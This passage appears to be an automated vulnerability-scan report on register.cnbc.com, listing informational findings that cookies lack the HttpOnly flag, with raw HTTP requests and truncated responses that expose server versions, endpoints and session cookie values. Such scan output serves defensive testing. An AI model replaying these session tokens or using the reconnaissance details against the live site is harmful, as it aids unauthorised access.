HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:46 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 231 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>Email Address is required</description> <timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp...[SNIP]...
13.154. https://register.cnbc.com/checkpassword.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkpassword.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkpassword.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:46 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 226 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>Password is required</description> <timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp> ...[SNIP]...
13.155. https://register.cnbc.com/checkscreenname.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkscreenname.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkscreenname.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 227 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>User name is required</description> <timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp> ...[SNIP]...
13.156. https://register.cnbc.com/checkzipcode.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/checkzipcode.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checkzipcode.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 226 Connection: close Content-Type: text/xml;charset=ISO-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/ <?xml version="1.0" encoding="ISO-8859-1"?> <response> <status>FAILURE</status> <description>Zip Code is required</description> <timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp> ...[SNIP]...
13.157. https://register.cnbc.com/createUser.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/createUser.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /createUser.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:45 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/ Content-Length: 54215 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Ty...[SNIP]...
13.158. https://register.cnbc.com/css/forgotPassword.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/forgotPassword.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/forgotPassword.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Mon, 01 Jun 2009 14:04:23 GMT ETag: "415-46b49e73a87c0" Accept-Ranges: bytes Content-Length: 1045 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ div{} .headerImage{margin-top:5px} .mainContent{width:970px;padding:0px;} .mainContent .heading{font-family:Arial;font-size:16;font-weight:bold;color:#2D648A;margin-bottom:20px;margin-top:40px;margin-...[SNIP]...
13.159. https://register.cnbc.com/css/member_center_sytles.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/member_center_sytles.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/member_center_sytles.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "135b-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 4955 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ /* CSS Document */ .cnbc_member_center_backbg{ background-image:url(../images/registration-04.jpg); background-repeat:repeat; } .cnbc_member_center_headerbg{ background-image:url(../images/membe...[SNIP]...
13.160. https://register.cnbc.com/css/newRegistration.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/newRegistration.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/newRegistration.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 20 Jan 2010 20:57:31 GMT ETag: "1778-47d9ed5bbc4c0" Accept-Ranges: bytes Content-Length: 6008 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ body{background-color:#FFFFFF;margin:0px; padding:0px} div{} /* border:1px solid */ .mainContent{width:635px;padding:0px;} .headerMessage{font-family:Arial;font-size:17;font-weight:bold;color:#4248...[SNIP]...
13.161. https://register.cnbc.com/css/registration.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/registration.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/registration.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "2a54-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 10836 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ .bodyclass { margin-top: 0px; background-image:url(../images/tile.gif); background-repeat:repeat; } .regis_copyright { font-family: Arial, Helvetica, sans-serif; font-size: 11px; font-...[SNIP]...
13.162. https://register.cnbc.com/email/EmailSupport.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/email/EmailSupport.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /email/EmailSupport.jsp HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:43 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ Content-Length: 91322 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <script lang="javascript" src="js/subjects.js"></script> <title>Contact Customer Service</...[SNIP]...
13.163. https://register.cnbc.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339311702; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:01:54 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 209 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> </body...[SNIP]...
13.164. https://register.cnbc.com/forgotPassword1.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/forgotPassword1.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /forgotPassword1.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do Content-Length: 45 Cache-Control: max-age=0 Origin: https://register.cnbc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339333234; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/images/clickToContinue.gif%2526ot%253DIMAGE step=step1&emailAddress=xss%40xss.cx&x=21&y=7
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:14 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/ Content-Length: 85679 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Reset Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" typ...[SNIP]...
13.165. https://register.cnbc.com/forgotpassword1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/forgotpassword1.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forgotpassword1.jsp HTTP/1.1 Host: register.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:01:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Location: http://register.cnbc.com/forgotPassword.do Content-Length: 0 Connection: close Content-Type: text/htmlSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/
13.166. https://register.cnbc.com/images/clickToContinue.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/clickToContinue.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/clickToContinue.gif HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:50 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Fri, 29 May 2009 14:10:16 GMT ETag: "4a4-46b0da2bec200" Accept-Ranges: bytes Content-Length: 1188 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:50 GMT Connection: close Content-Type: image/gifSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ GIF89a~.................................BHXNSbOTcY^l[`nZ_m~..|..............ejvhmypu.ty.............rw.....................................................................................................[SNIP]...
13.167. https://register.cnbc.com/images/loaderImage.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/loaderImage.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/loaderImage.gif HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "109e-46941f222cbc0" Accept-Ranges: bytes Content-Length: 4254 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/gifSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ GIF89a.......,*,.........dfd...............DFD...trt..................464.........ljl............TVT...tvt...!..NETSCAPE2.0.....!.......,............$j..Ab.J..I.*U.*..).*..@$.........\N....(.: H..Cd6...[SNIP]...
13.168. https://register.cnbc.com/images/memberCenterHeader.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/memberCenterHeader.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/memberCenterHeader.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:50 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "2a29-46941f222cbc0" Accept-Ranges: bytes Content-Length: 10793 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:50 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ ......JFIF.....H.H.....5Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:02:10 13:45:24............[SNIP]...
13.169. https://register.cnbc.com/images/submitPreferences.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/submitPreferences.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/submitPreferences.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
